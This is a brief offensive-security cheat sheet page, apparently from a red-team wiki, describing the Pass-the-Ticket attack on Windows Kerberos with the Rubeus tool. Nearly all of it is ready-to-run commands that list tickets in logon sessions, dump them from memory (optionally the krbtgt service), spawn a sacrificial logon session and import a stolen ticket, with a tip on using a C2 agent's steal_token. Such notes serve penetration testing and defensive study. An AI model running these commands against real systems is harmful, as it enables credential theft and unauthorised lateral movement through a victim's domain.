Comment on page
Pass-the-Ticket

Rubeus
Show Kerberos tickets in all logon sessions if elevated (otherwise it will only show tickets in current logon session):
PS > .\Rubeus.exe triage
Extract the tickets from memory:
PS > .\Rubeus.exe dump [/service:krbtgt] [/luid:0x1337] /nowrap
Create a sacrificial process (Logon type 9) and import the TGT into its logon session:
PS > .\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /show
PS > .\Rubeus.exe ptt /luid:0x1337 /ticket:<BASE64_TICKET>
If operating Rubeus from a C2 agent, you can steal_token instead of using /show option.
You can also extract and reuse TGS tickets with this technique.
Last modified 2yr ago